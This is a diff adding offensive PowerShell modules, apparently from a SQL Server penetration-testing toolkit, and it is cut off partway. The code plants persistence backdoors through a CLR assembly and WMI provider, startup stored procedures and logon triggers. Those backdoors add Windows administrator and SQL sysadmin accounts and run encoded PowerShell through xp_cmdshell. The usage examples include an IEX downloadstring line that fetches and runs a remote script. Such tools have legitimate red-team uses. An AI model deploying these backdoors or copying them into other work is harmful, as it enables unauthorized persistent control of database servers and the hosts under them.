mClass = new ManagementClass(@`"\\`" + `"127.0.0.1`" + @`"\root\cimv2:Win32_Process`"); + mClass.InvokeMethod(`"Create`", theProcessToRun); + + // Return test script + return `"test`"; + } + } + }" + + # Write c sharp code to a file + $OutDir = $env:temp + $OutFileName = $WmiFileName + $OutFilePath = "$OutDir\$OutFileName.cs" + Write-Verbose -Message "$Instance : Writing WMI provider code to: $OutFilePath" + $WMICS | Out-File $OutFilePath + + # Identify the path to csc.exe + Write-Verbose -Message "$Instance : Searching for .net framework v3 csc.exe" + $CSCPath = Get-ChildItem -Recurse "C:\Windows\Microsoft.NET\" -Filter "csc.exe" | where {$_.FullName -like "*v3*" -and $_.fullname -like "*Framework64*"} | Select-Object fullname -First 1 -ExpandProperty fullname + if(-not $CSCPath){ + Write-Verbose -Message "$Instance : No csc.exe found." + return + }else{ + Write-Verbose -Message "$Instance : Found csc.exe: $CSCPath" + } + + # Compile the .cs file to a .dll using csc.exe + $CurrentDirectory = pwd + cd $OutDir + $Command = "$CSCPath /target:library /R:system.configuration.install.dll /R:system.enterpriseservices.dll /R:system.management.dll /R:system.management.instrumentation.dll " + $OutFilePath + Write-Verbose -Message "$Instance : Compiling WMI provider code to: $OutDir\$OutFileName.dll" + $Results = Invoke-Expression $Command + cd $CurrentDirectory + $WMIFilePath1 = "$OutDir\$OutFileName.dll" + + # ------------------------------------ + # Setup and Compile SQL Server CLR DLL + # ------------------------------------ + + Write-Verbose -Message "$Instance : Converting WMI provider DLL to base64" + + # Read the DLL into a byte array + $FileBytes = [System.IO.File]::ReadAllBytes("$WMIFilePath1") + + # Convert the byte array in the a Base64 string + $FileBytes64 = [Convert]::ToBase64String($FileBytes); + + # Remove dll and cs files - pending + + Write-Verbose -Message "$Instance : Generating SQL Server CLR C# Code" + + # Define random variables for the clr + $AssemblyLength = (5..10 | Get-Random -count 1 ) + $AssemblyName = (-join ((65..90) + (97..122) | Get-Random -Count $AssemblyLength | % {[char]$_})) + Write-Verbose -Message "$Instance : - SQL CLR Assembly Name: $AssemblyName.dll" + + $ClassNameLength = (5..10 | Get-Random -count 1 ) + $ClassName = (-join ((65..90) + (97..122) | Get-Random -Count $ClassNameLength | % {[char]$_})) + Write-Verbose -Message "$Instance : - SQL CLR ClassName: $ClassName" + + $MethodNameLength = (5..10 | Get-Random -count 1 ) + $MethodName = (-join ((65..90) + (97..122) | Get-Random -Count $MethodNameLength | % {[char]$_})) + Write-Verbose -Message "$Instance : - SQL CLR MethodName: $MethodName" + + $ProcNameLength = (5..10 | Get-Random -count 1 ) + $ProcName = (-join ((65..90) + (97..122) | Get-Random -Count $ProcNameLength | % {[char]$_})) + Write-Verbose -Message "$Instance : - SQL CLR Proc Name: $ProcName" + + # Define SQL Server CLR Assembly Code +$TemplateCmdExec = @" + using System; + using System.Data; + using System.Data.SqlClient; + using System.Data.SqlTypes; + using Microsoft.SqlServer.Server; + using System.IO; + using System.Diagnostics; + using System.Text; + using System.Collections.Generic; + using System.Management; + + public partial class $ClassName + { + [Microsoft.SqlServer.Server.SqlProcedure] + public static void $MethodName (SqlString execCommand) + { + // Check for local administrator privileges - pending + + // Convert Base64 to byte array + byte[] MyByteArray2 = Convert.FromBase64String("$FileBytes64"); + + // Write all bytes to another file + File.WriteAllBytes("c:\\windows\\system32\\wbem\\$WmiFileName.dll",MyByteArray2); + + // Create new process to install the wmi provider + Process proc = new Process(); + proc.StartInfo.FileName = @"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"; + proc.StartInfo.Arguments = string.Format(@" c:\\windows\\system32\\wbem\\$WmiFileName.dll", execCommand.Value); + proc.StartInfo.UseShellExecute = false; + proc.StartInfo.RedirectStandardOutput = true; + proc.Start(); + + // Execute custom wmi method from custom wmi class via wmi using c sharp + ManagementClass mClass = new ManagementClass(@"\\" + "127.0.0.1" + @"\root\cimv2:Win32_$WMIClass"); + object results = mClass.InvokeMethod("$WMIMethod", null); + + // Test getting process list - multiple line output reading + // ManagementClass c = new ManagementClass("Win32_Process"); + // StringBuilder builder = new StringBuilder(); + // foreach (ManagementObject o in c.GetInstances()) + // builder.Append(o).AppendLine(o["Name"].ToString()); + + // Create the record and specify the metadata for the columns. + SqlDataRecord record = new SqlDataRecord(new SqlMetaData("output", SqlDbType.NVarChar, 4000)); + + // Mark the begining of the result-set. + SqlContext.Pipe.SendResultsStart(record); + + // Set values for each column in the row + record.SetString(0, results.ToString()); + + // Send the row back to the client. + SqlContext.Pipe.SendResultsRow(record); + + // Mark the end of the result-set. + SqlContext.Pipe.SendResultsEnd(); + + proc.WaitForExit(); + proc.Close(); + + // Remove provider - pending + + // Remove dll - pending + } + }; +"@ + + # Write out the cs code + $ClrFileNameLen = (5..10 | Get-Random -count 1 ) + $ClrFileName = (-join ((65..90) + (97..122) | Get-Random -Count $ClrFileNameLen | % {[char]$_})) + $SRCPath = $OutDir + "\$ClrFileName.cs" + Write-Verbose -Message "$Instance : Writing SQL Server CLR code to: $SRCPath" + $TemplateCmdExec | Out-File $SRCPath + + # Setup and compile the dll + $CurrentDirectory = pwd + cd $OutDir + $Command = "$CSCPath /target:library " + $OutDir + "\$ClrFileName.cs" + Write-Verbose -Message "$Instance : Compiling SQL Server CLR code to: $OutDir\$ClrFileName.dll" + $Results = Invoke-Expression $Command + cd $CurrentDirectory + + # -------------------------------------- + # Install and CLR DLLs on the SQL Server + # -------------------------------------- + + # Register system.management.dll w + # Note: This is required for the C Sharp CLR to call WMI + Write-Verbose -Message "$Instance : Registering assembly system.management.dll on SQL Server instance" + $stringBuilder0 = New-Object -Type System.Text.StringBuilder + $null = $stringBuilder0.AppendLine("CREATE ASSEMBLY [system.management]") + $null = $stringBuilder0.AppendLine("from 'C:\windows\Microsoft.NET\Framework\v4.0.30319\System.Management.dll'") + $null = $stringBuilder0.AppendLine("with permission_set = unsafe") + $stringBuilder0cmd= $stringBuilder0.ToString() -join "" + $Result0 = Get-SQLQuery -ReturnError -Instance $Instance -Query $stringBuilder0cmd -Username $Username -Password $Password -Credential $Credential -SuppressVerbose -Database msdb + + # Set paths to CLR dll + $assemblyFile = "$OutDir\$ClrFileName.dll" + + # Generate TSQL CREATE ASSEMBLY string + Write-Verbose -Message "$Instance : Generating CREATE ASSEMBLY TSQL from SQL Server CLR DLL" + $stringBuilder1 = New-Object -Type System.Text.StringBuilder + $stringBuilder1.Append("CREATE ASSEMBLY [") > $null + $stringBuilder1.Append($AssemblyName) > $null + $stringBuilder1.Append("] AUTHORIZATION [dbo] FROM `n0x") > $null + $fileStream = [IO.File]::OpenRead($assemblyFile) + while (($byte = $fileStream.ReadByte()) -gt -1) { + $stringBuilder1.Append($byte.ToString("X2")) > $null + } + $fileStream.Close() + $fileStream.Dispose() + $null = $stringBuilder1.AppendLine("`nWITH PERMISSION_SET = UNSAFE") + $stringBuilder1cmd= $stringBuilder1.ToString() -join "" + + # Execute CREATE ASSEMBLY string + Write-Verbose -Message "$Instance : Executing CREATE ASSEMBLY TSQL on SQL Server" + $Result1 = Get-SQLQuery -ReturnError -Instance $Instance -Query $stringBuilder1cmd -Username $Username -Password $Password -Credential $Credential -SuppressVerbose -Database msdb + + # Create CREATE PROCEDURE string + Write-Verbose -Message "$Instance : Generating CREATE PROCEDURE TSQL" + $stringBuilder2 = New-Object -Type System.Text.StringBuilder + $null = $stringBuilder2.AppendLine("CREATE PROCEDURE [dbo].[$ProcName] @execCommand NVARCHAR (4000) AS EXTERNAL NAME [$AssemblyName].[$ClassName].[$MethodName];") + $stringBuilder2cmd= $stringBuilder2.ToString() -join "" + + # Execute CREATE PROCEDURE string + Write-Verbose -Message "$Instance : Executing CREATE PROCEDURE TSQL on SQL Server" + $Result2 = Get-SQLQuery -ReturnError -Instance $Instance -Query $stringBuilder2cmd -Username $Username -Password $Password -Credential $Credential -SuppressVerbose -Database msdb + + # Create execute procedure string + Write-Verbose -Message "$Instance : Generating exec statement for CLR sp in TSQL" + $stringBuilder3 = New-Object -Type System.Text.StringBuilder + $null = $stringBuilder3.AppendLine("EXEC[dbo].[$ProcName] 'whoami'") + $stringBuilder3cmd= $stringBuilder3.ToString() -join "" + + # Execute sp string + Write-Verbose -Message "$Instance : Executing CLR sp on SQL Server (which will install the custom wmi provider and run the target wmi method)" + $CmdResults = Get-SQLQuery -Instance $Instance -Query $stringBuilder3cmd -Username $Username -Password $Password -Credential $Credential -SuppressVerbose -Database msdb + + # Status user + Write-Verbose -Message "$Instance : Dest WMI filename on sql server: c:\windows\system32\wbem\$WmiFileName.dll" + Write-Verbose -Message "$Instance : manual wmic command: invoke-wmimethod -class Win32_$WMIClass -Name $WMIMethod" + + + # Execute OS command + # $CmdResults = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose -Database "MSDB" | Select-Object -Property output -ExpandProperty output + + # Display results or add to final results table + if($RawResults) + { + [string]$CmdResults.output + } + else + { + $null = $TblResults.Rows.Add($ComputerName, $Instance, [string]$CmdResults.output) + } + + # Remove procedure and assembly + Get-SQLQuery -Instance $Instance -Query "DROP PROCEDURE cmd_exec" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose -Database "MSDB" + Get-SQLQuery -Instance $Instance -Query "DROP ASSEMBLY cmd_exec" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose -Database "MSDB" + #> + + # Restore CLR state if needed + if($DisableCLR -eq 1) + { + Write-Verbose -Message "$Instance : Disabling CLR" + Get-SQLQuery -Instance $Instance -Query "sp_configure 'CLR Enabled',0;RECONFIGURE" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + } + + # Restore Show Advanced Options state if needed + if($DisableShowAdvancedOptions -eq 1) + { + Write-Verbose -Message "$Instance : Disabling Show Advanced Options" + Get-SQLQuery -Instance $Instance -Query "sp_configure 'Show Advanced Options',0;RECONFIGURE" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + } + + # Close connection + $Connection.Close() + + # Dispose connection + $Connection.Dispose() + } + catch + { + # Connection failed + + if(-not $SuppressVerbose) + { + $ErrorMessage = $_.Exception.Message + Write-Verbose -Message "$Instance : Connection Failed." + #Write-Verbose " Error: $ErrorMessage" + } + + # Add record + $null = $TblResults.Rows.Add("$ComputerName","$Instance",'Not Accessible') + } + } + + # Run scriptblock using multi-threading + $PipelineItems | Invoke-Parallel -ScriptBlock $MyScriptBlock -ImportSessionFunctions -ImportVariables -Throttle $Threads -RunspaceTimeout 2 -Quiet -ErrorAction SilentlyContinue + + return $TblResults + } +} diff --git a/scripts/pending/Invoke-SqlServer-Persist-StartupSp.psm1 b/scripts/pending/Invoke-SqlServer-Persist-StartupSp.psm1 new file mode 100644 index 0000000..0576e3f --- /dev/null +++ b/scripts/pending/Invoke-SqlServer-Persist-StartupSp.psm1 @@ -0,0 +1,471 @@ +function Invoke-SqlServer-Persist-StartupSp +{ + <# + .SYNOPSIS + This script can be used backdoor a Windows system using a SQL Server startup stored procedure. + This is done marking a user defined stored procedure to run when the SQL Server is restarted + using the native sp_procoption stored procedure. Note: This script requires sysadmin privileges. + + .DESCRIPTION + This script can be used backdoor a Windows system using a SQL Server startup stored procedure. + This is done marking a user defined stored procedure to run when the SQL Server is restarted + using the native sp_procoption stored procedure. This script supports the executing operating system + and PowerShell commands as the SQL Server service account using the native xp_cmdshell stored procedure. + The script also support add a new sysadmin. This script can be run as the current Windows user or a + SQL Server login can be provided. Note: This script requires sysadmin privileges. + + .EXAMPLE + Create startup stored procedure to add a new sysadmin. The example shows the script being run using a SQL Login. + + PS C:\> Invoke-SqlServer-Persist-StartupSp -SqlServerInstance "SERVERNAME\INSTANCENAME" -SqlUser MySQLAdmin -SqlPass MyPassword123! -NewSqlUser mysqluser -NewSqlPass NewPassword123! + + .EXAMPLE + Create startup stored procedure to add a local administrator to the Windows OS via xp_cmdshell. The example shows the script + being run as the current windows user. + + PS C:\> Invoke-SqlServer-Persist-StartupSp -SqlServerInstance "SERVERNAME\INSTANCENAME" -NewOsUser myosuser -NewOsPass NewPassword123! + + .EXAMPLE + Create startup stored procedure to run a PowerShell command via xp_cmdshell. The example below downloads a PowerShell script and + from the internet and executes it. The example shows the script being run as the current Windows user. + + PS C:\> Invoke-SqlServer-Persist-StartupSp -Verbose -SqlServerInstance "SERVERNAME\INSTANCENAME" -PsCommand "IEX(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/nullbind/Powershellery/master/Brainstorming/helloworld.ps1')" + + .LINK + http://www.netspi.com + http://msdn.microsoft.com/en-us/library/ms178640.aspx + + .NOTES + Author: Scott Sutherland - 2016, NetSPI + Version: Invoke-SqlServer-Persist-StartupSp.psm1 v1.0 + Comments: + - This should work on SQL Server 2005 and Above. + - The added procedures can be manually viewed using the query below. + SELECT ROUTINE_NAME, ROUTINE_DEFINITION + FROM MASTER.INFORMATION_SCHEMA.ROUTINES + WHERE OBJECTPROPERTY(OBJECT_ID(ROUTINE_NAME),'ExecIsStartup') = 1 + - The procedures can also be removed with tsql below. + drop proc sp_add_osadmin + drop proc sp_add_sysadmin + drop proc sp_add_pscmd + #> + + [CmdletBinding()] + Param( + + [Parameter(Mandatory=$false, + HelpMessage='Set SQL Login username.')] + [string]$SqlUser, + + [Parameter(Mandatory=$false, + HelpMessage='Set SQL Login password.')] + [string]$SqlPass, + + [Parameter(Mandatory=$false, + HelpMessage='Set username for new SQL Server sysadmin login.')] + [string]$NewSqlUser, + + [Parameter(Mandatory=$false, + HelpMessage='Set password for new SQL Server sysadmin login.')] + [string]$NewSqlPass, + + [Parameter(Mandatory=$false, + HelpMessage='Set username for new Windows local administrator account.')] + [string]$NewOsUser, + + [Parameter(Mandatory=$false, + HelpMessage='Set password for new Windows local administrator account.')] + [string]$NewOsPass, + + [Parameter(Mandatory=$false, + HelpMessage='Create stored procedure that run the provide PowerShell command.')] + [string]$PsCommand, + + [Parameter(Mandatory=$true, + HelpMessage='Set target SQL Server instance.')] + [string]$SqlServerInstance + + ) + + # ----------------------------------------------- + # Setup database connection string + # ----------------------------------------------- + + # Create fun connection object + $conn = New-Object System.Data.SqlClient.SqlConnection + + # Set authentication type and create connection string + if($SqlUser){ + + # SQL login / alternative domain credentials + Write-Output "[*] Attempting to authenticate to $SqlServerInstance with SQL login $SqlUser..." + $conn.ConnectionString = "Server=$SqlServerInstance;Database=master;User ID=$SqlUser;Password=$SqlPass;" + [string]$ConnectUser = $SqlUser + }else{ + + # Trusted connection + Write-Output "[*] Attempting to authenticate to $SqlServerInstance as the current Windows user..." + $conn.ConnectionString = "Server=$SqlServerInstance;Database=master;Integrated Security=SSPI;" + $UserDomain = [Environment]::UserDomainName + $Username = [Environment]::UserName + $ConnectUser = "$UserDomain\$Username" + } + + + # ------------------------------------------------------- + # Test database connection + # ------------------------------------------------------- + + try{ + $conn.Open() + Write-Host "[*] Connected." + $conn.Close() + }catch{ + $ErrorMessage = $_.Exception.Message + Write-Host "[*] Connection failed" -foreground "red" + Write-Host "[*] Error: $ErrorMessage" -foreground "red" + Break + } + + + # ------------------------------------------------------- + # Check if the user is a sysadmin + # ------------------------------------------------------- + + # Open db connection + $conn.Open() + + # Setup query + $Query = "select is_srvrolemember('sysadmin') as sysstatus" + + # Execute query + $cmd = New-Object System.Data.SqlClient.SqlCommand($Query,$conn) + $results = $cmd.ExecuteReader() + + # Parse query results + $TableIsSysAdmin = New-Object System.Data.DataTable + $TableIsSysAdmin.Load($results) + + # Check if current user is a sysadmin + $TableIsSysAdmin | Select-Object -First 1 sysstatus | foreach { + + $Checksysadmin = $_.sysstatus + if ($Checksysadmin -ne 0){ + Write-Host "[*] Confirmed Sysadmin access." + }else{ + Write-Host "[*] The current user does not have sysadmin privileges." -foreground "red" + Write-Host "[*] Sysadmin privileges are required." -foreground "red" + Break + } + } + + # Close db connection + $conn.Close() + + # ------------------------------------------------------- + # Enabled Show Advanced Options - needed for xp_cmdshell + # ------------------------------------------------------- + + # Status user + Write-Host "[*] Enabling 'Show Advanced Options', if required..." + + # Open db connection + $conn.Open() + + # Setup query + $Query = "IF (select value_in_use from sys.configurations where name = 'Show Advanced Options') = 0 + EXEC ('sp_configure ''Show Advanced Options'',1;RECONFIGURE')" + + # Execute query + $cmd = New-Object System.Data.SqlClient.SqlCommand($Query,$conn) + $results = $cmd.ExecuteReader() + + # Close db connection + $conn.Close() + + + # ------------------------------------------------------- + # Enabled xp_cmdshell - needed for os commands + # ------------------------------------------------------- + + Write-Host "[*] Enabling 'xp_cmdshell', if required..." + + # Open db connection + $conn.Open() + + # Setup query + $Query = "IF (select value_in_use from sys.configurations where name = 'xp_cmdshell') = 0 + EXEC ('sp_configure ''xp_cmdshell'',1;RECONFIGURE')" + + # Execute query + $cmd = New-Object System.Data.SqlClient.SqlCommand($Query,$conn) + $results = $cmd.ExecuteReader() + + # Close db connection + $conn.Close() + + + # ------------------------------------------------------- + # Check if the service account is local admin + # ------------------------------------------------------- + + Write-Host "[*] Checking if service account is a local administrator..." + + # Open db connection + $conn.Open() + + # Setup query + $Query = @" + + -- Setup reg path + DECLARE @SQLServerInstance varchar(250) + if @@SERVICENAME = 'MSSQLSERVER' + BEGIN + set @SQLServerInstance = 'SYSTEM\CurrentControlSet\Services\MSSQLSERVER' + END + ELSE + BEGIN + set @SQLServerInstance = 'SYSTEM\CurrentControlSet\Services\MSSQL$'+cast(@@SERVICENAME as varchar(250)) + END + + -- Grab service account from service's reg path + DECLARE @ServiceaccountName varchar(250) + EXECUTE master.dbo.xp_instance_regread + N'HKEY_LOCAL_MACHINE', @SQLServerInstance, + N'ObjectName',@ServiceAccountName OUTPUT, N'no_output' + + DECLARE @MachineType SYSNAME + EXECUTE master.dbo.xp_regread + @rootkey = N'HKEY_LOCAL_MACHINE', + @key = N'SYSTEM\CurrentControlSet\Control\ProductOptions', + @value_name = N'ProductType', + @value = @MachineType output + + -- Grab more info about the server + SELECT @ServiceAccountName as SvcAcct +"@ + + # Execute query + $cmd = New-Object System.Data.SqlClient.SqlCommand($Query,$conn) + $results = $cmd.ExecuteReader() + + # Parse query results + $TableServiceAccount = New-Object System.Data.DataTable + $TableServiceAccount.Load($results) + $SqlServeServiceAccountDirty = $TableServiceAccount | select SvcAcct -ExpandProperty SvcAcct + $SqlServeServiceAccount = $SqlServeServiceAccountDirty -replace '\.\\','' + + # Close db connection + $conn.Close() + + # Open db connection + $conn.Open() + + # Setup query + $Query = "EXEC master..xp_cmdshell 'net localgroup Administrators';" + + # Execute query + $cmd = New-Object System.Data.SqlClient.SqlCommand($Query,$conn) + $results = $cmd.ExecuteReader() + + # Parse query results + $TableServiceAccountPriv = New-Object System.Data.DataTable + $TableServiceAccountPriv.Load($results) + + # Close db connection + $conn.Close() + if($SqlServeServiceAccount -eq "LocalSystem" -or $TableServiceAccountPriv -contains "$SqlServeServiceAccount"){ + Write-Host "[*] The service account $SqlServeServiceAccount has local administrator privileges." + $SvcAdmin = 1 + }else{ + Write-Host "[*] The service account $SqlServeServiceAccount does NOT have local administrator privileges." + $SvcAdmin = 0 + } + + # ------------------------------------------------------- + # Create startup stored procedure to run PowerShell code + # ------------------------------------------------------- + + if($PsCommand){ + + # Status user + Write-Host "[*] Creating a stored procedure to run PowerShell code..." -foreground "green" + + # Check for local administrator privs + if($SvcAdmin -eq 0){ + Write-Host "[*] Note: The PowerShell wont be able to take administrative actions." -foreground "green" + } + + # --------------------------- + # Create procedure + # --------------------------- + + # This encoding method was based on a function by Carlos Perez + # https://raw.githubusercontent.com/darkoperator/Posh-SecMod/master/PostExploitation/PostExploitation.psm1 + + # Encode PowerShell command + $CmdBytes = [Text.Encoding]::Unicode.GetBytes($PsCommand) + $EncodedCommand = [Convert]::ToBase64String($CmdBytes) + + # Check if PowerShell command is too long + If ($EncodedCommand.Length -gt 8100) + { + Write-Host "Encoded is too long." -foreground "red" + }else{ + + # Open db connection + $conn.Open() + + # Setup query + $Query = "IF NOT EXISTS (SELECT * FROM sys.objects WHERE type = 'P' AND OBJECT_ID = OBJECT_ID('dbo.sp_add_pscmd')) + exec('CREATE PROCEDURE sp_add_pscmd + AS + EXEC master..xp_cmdshell ''PowerShell -enc $EncodedCommand''');" + + # Execute query + $cmd = New-Object System.Data.SqlClient.SqlCommand($Query,$conn) + $results = $cmd.ExecuteReader() + + # Close db connection + $conn.Close() + + # --------------------------- + # Mark procedure for startup + # --------------------------- + + # Open db connection + $conn.Open() + + # Setup query - mark procedure for startup + $Query = "EXEC sp_procoption @ProcName = 'sp_add_pscmd', + @OptionName = 'startup', + @OptionValue = 'on';" + + # Execute query - mark procedure for startup + $cmd = New-Object System.Data.SqlClient.SqlCommand($Query,$conn) + $results = $cmd.ExecuteReader() + + # Close db connection + $conn.Close() + + Write-Host "[*] Startup stored procedure sp_add_pscmd added to run provided PowerShell command." -foreground "green" + } + }else{ + Write-Host "[*] sp_add_pscmd will not be created because pscommand was not provided." + } + + + # ------------------------------------------------------- + # Create startup stored procedure to add OS Administrator + # ------------------------------------------------------- + + if($NewOsUser){ + + # Check for local administrator privs + if($SvcAdmin -eq 0){ + Write-Host "[*] sp_add_osadmin will not be created because the service account does not have local administrator privileges." + }else{ + + # Status user + Write-Host "[*] Creating a stored procedure to create a os administrator..." -foreground "green" + + # --------------------------- + # Create procedure + # --------------------------- + + # Open db connection + $conn.Open() + + # Setup query + $Query = "IF NOT EXISTS (SELECT * FROM sys.objects WHERE type = 'P' AND OBJECT_ID = OBJECT_ID('dbo.sp_add_osadmin')) + exec('CREATE PROCEDURE sp_add_osadmin + AS + EXEC master..xp_cmdshell ''net user $NewOsUser $NewOsPass /add & net localgroup administrators /add $NewOsUser''');" + + # Execute query - create procedure + $cmd = New-Object System.Data.SqlClient.SqlCommand($Query,$conn) + $results = $cmd.ExecuteReader() + + # Close db connection + $conn.Close() + + # --------------------------- + # Mark procedure for startup + # --------------------------- + + # Open db connection + $conn.Open() + + # Setup query + $Query = "EXEC sp_procoption @ProcName = 'sp_add_osadmin', + @OptionName = 'startup', + @OptionValue = 'on';" + + # Execute query + $cmd = New-Object System.Data.SqlClient.SqlCommand($Query,$conn) + $results = $cmd.ExecuteReader() + + # Close db connection + $conn.Close() + + Write-Host "[*] Startup stored procedure sp_add_osadmin was created to add os admin $NewOsUser with password $NewOSPass." -foreground "green" + } + }else{ + Write-Host "[*] sp_add_osadmin will not be created because NewOsUser and NewOsPass were not provided." + } + + # ------------------------------------------------------- + # Create startup stored procedure to add a sysadmin + # ------------------------------------------------------- + + if($NewSqlUser){ + + # Status user + Write-Host "[*] Creating stored procedure sp_add_sysadmin..." -foreground "green" + + # --------------------------- + # Create procedure + # --------------------------- + + # Open db connection + $conn.Open() + + # Setup query + $Query = "IF NOT EXISTS (SELECT * FROM sys.objects WHERE type = 'P' AND OBJECT_ID = OBJECT_ID('dbo.sp_add_sysadmin')) + exec('CREATE PROCEDURE sp_add_sysadmin + AS + CREATE LOGIN $NewSqlUser WITH PASSWORD = ''$NewSqlPass''; + EXEC sp_addsrvrolemember ''$NewSqlUser'', ''sysadmin'';')" + + # Execute query + $cmd = New-Object System.Data.SqlClient.SqlCommand($Query,$conn) + $results = $cmd.ExecuteReader() + + # Close db connection + $conn.Close() + + # --------------------------- + # Mark procedure for startup + # --------------------------- + + # Open db connection + $conn.Open() + + # Setup query + $Query = "EXEC sp_procoption @ProcName = 'sp_add_sysadmin', + @OptionName = 'startup', + @OptionValue = 'on';" + + # Execute query - mark procedure for startup + $cmd = New-Object System.Data.SqlClient.SqlCommand($Query,$conn) + $results = $cmd.ExecuteReader() + + # Close db connection + $conn.Close() + + Write-Host "[*] Startup stored procedure sp_add_sysadmin was created to add sysadmin $NewSqlUser with password $NewSqlPass." -foreground "green" + }else{ + Write-Host "[*] sp_add_sysadmin will not be created because NewSqlUser and NewSqlPass were not provided." + } + Write-Host "[*] All done." +} diff --git a/scripts/pending/Invoke-SqlServer-Persist-TriggerLogon.psm1 b/scripts/pending/Invoke-SqlServer-Persist-TriggerLogon.psm1 new file mode 100644 index 0000000..581f3bd --- /dev/null +++ b/scripts/pending/Invoke-SqlServer-Persist-TriggerLogon.psm1 @@ -0,0 +1,484 @@ +function Invoke-SqlServer-Persist-TriggerLogon +{ + <# + .SYNOPSIS + This script can be used backdoor a Windows system using SQL Serverlogon triggers. + + .DESCRIPTION + This script can be used backdoor a Windows system using a SQL Server logon triggers. + As a result, the associated TSQL will execute when any the attack attempts tog login as eviluser with + the password "Password123!". This script supports the executing operating system + and PowerShell commands as the SQL Server service account using the native xp_cmdshell stored procedure. + The script also support add a new sysadmin. This script can be run as the current Windows user or a + SQL Server login can be provided. Note: + + .EXAMPLE + Create a logon trigger to add a new sysadmin. The example shows the script being run using a SQL Login. + + PS C:\> Invoke-SqlServer-Persist-TriggerLogon -SqlServerInstance "SERVERNAME\INSTANCENAME" -SqlUser MySQLAdmin -SqlPass MyPassword123! -NewSqlUser mysqluser -NewSqlPass NewPassword123! + + .EXAMPLE + Create a logon trigger to add a local administrator to the Windows OS via xp_cmdshell. The example shows the script + being run as the current windows user. + + PS C:\> Invoke-SqlServer-Persist-TriggerLogon -SqlServerInstance "SERVERNAME\INSTANCENAME" -NewOsUser myosuser -NewOsPass NewPassword123! + + .EXAMPLE + Create a logon trigger to run a PowerShell command via xp_cmdshell. The example below downloads a PowerShell script and + from the internet and executes it. The example shows the script being run as the current Windows user. + + PS C:\> Invoke-SqlServer-Persist-TriggerLogon -Verbose -SqlServerInstance "SERVERNAME\INSTANCENAME" -PsCommand "IEX(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/nullbind/Powershellery/master/Brainstorming/helloworld.ps1')" + + .EXAMPLE + Remove evil logon triggers as the current Windows user. + + PS C:\> Invoke-SqlServer-Persist-TriggerLogon -Verbose -SqlServerInstance "SERVERNAME\INSTANCENAME" -Remove + + .LINK + http://www.netspi.com + https://technet.microsoft.com/en-us/library/ms186582(v=sql.90).aspx + + .NOTES + Author: Scott Sutherland - 2016, NetSPI + Version: Invoke-SqlServer-Persist-TriggerLogon.psm1 v1.0 + #> + + [CmdletBinding()] + Param( + + [Parameter(Mandatory=$false, + HelpMessage='Set SQL Login username.')] + [string]$SqlUser, + + [Parameter(Mandatory=$false, + HelpMessage='Set SQL Login password.')] + [string]$SqlPass, + + [Parameter(Mandatory=$false, + HelpMessage='Set username for new SQL Server sysadmin login.')] + [string]$NewSqlUser, + + [Parameter(Mandatory=$false, + HelpMessage='Set password for new SQL Server sysadmin login.')] + [string]$NewSqlPass, + + [Parameter(Mandatory=$false, + HelpMessage='Set username for new Windows local administrator account.')] + [string]$NewOsUser, + + [Parameter(Mandatory=$false, + HelpMessage='Set password for new Windows local administrator account.')] + [string]$NewOsPass, + + [Parameter(Mandatory=$false, + HelpMessage='Create trigger that will run the provide PowerShell command.')] + [string]$PsCommand, + + [Parameter(Mandatory=$true, + HelpMessage='Set target SQL Server instance.')] + [string]$SqlServerInstance, + + [Parameter(Mandatory=$false, + HelpMessage='This will remove the trigger named evil_DDL_trigger create by this script.')] + [Switch]$Remove + ) + + # ----------------------------------------------- + # Setup database connection string + # ----------------------------------------------- + + # Create fun connection object + $conn = New-Object System.Data.SqlClient.SqlConnection + + # Set authentication type and create connection string + if($SqlUser){ + + # SQL login / alternative domain credentials + Write-Output "[*] Attempting to authenticate to $SqlServerInstance with SQL login $SqlUser..." + $conn.ConnectionString = "Server=$SqlServerInstance;Database=master;User ID=$SqlUser;Password=$SqlPass;" + [string]$ConnectUser = $SqlUser + }else{ + + # Trusted connection + Write-Output "[*] Attempting to authenticate to $SqlServerInstance as the current Windows user..." + $conn.ConnectionString = "Server=$SqlServerInstance;Database=master;Integrated Security=SSPI;" + $UserDomain = [Environment]::UserDomainName + $Username = [Environment]::UserName + $ConnectUser = "$UserDomain\$Username" + } + + + # ------------------------------------------------------- + # Test database connection + # ------------------------------------------------------- + + try{ + $conn.Open() + Write-Host "[*] Connected." + $conn.Close() + }catch{ + $ErrorMessage = $_.Exception.Message + Write-Host "[*] Connection failed" -foreground "red" + Write-Host "[*] Error: $ErrorMessage" -foreground "red" + Break + } + + + # ------------------------------------------------------- + # Check if the user is a sysadmin + # ------------------------------------------------------- + + # Open db connection + $conn.Open() + + # Setup query + $Query = "select is_srvrolemember('sysadmin') as sysstatus" + + # Execute query + $cmd = New-Object System.Data.SqlClient.SqlCommand($Query,$conn) + $results = $cmd.ExecuteReader() + + # Parse query results + $TableIsSysAdmin = New-Object System.Data.DataTable + $TableIsSysAdmin.Load($results) + + # Check if current user is a sysadmin + $TableIsSysAdmin | Select-Object -First 1 sysstatus | foreach { + + $Checksysadmin = $_.sysstatus + if ($Checksysadmin -ne 0){ + Write-Host "[*] Confirmed Sysadmin access." + }else{ + Write-Host "[*] The current user does not have sysadmin privileges." -foreground "red" + Write-Host "[*] Sysadmin privileges are required." -foreground "red" + Break + } + } + + # Close db connection + $conn.Close() + + # ------------------------------------------------------- + # Enabled Show Advanced Options - needed for xp_cmdshell + # ------------------------------------------------------- + + # Status user + Write-Host "[*] Enabling 'Show Advanced Options', if required..." + + # Open db connection + $conn.Open() + + # Setup query + $Query = "IF (select value_in_use from sys.configurations where name = 'Show Advanced Options') = 0 + EXEC ('sp_configure ''Show Advanced Options'',1;RECONFIGURE')" + + # Execute query + $cmd = New-Object System.Data.SqlClient.SqlCommand($Query,$conn) + $results = $cmd.ExecuteReader() + + # Close db connection + $conn.Close() + + + # ------------------------------------------------------- + # Enabled xp_cmdshell - needed for os commands + # ------------------------------------------------------- + + Write-Host "[*] Enabling 'xp_cmdshell', if required..." + + # Open db connection + $conn.Open() + + # Setup query + $Query = "IF (select value_in_use from sys.configurations where name = 'xp_cmdshell') = 0 + EXEC ('sp_configure ''xp_cmdshell'',1;RECONFIGURE')" + + # Execute 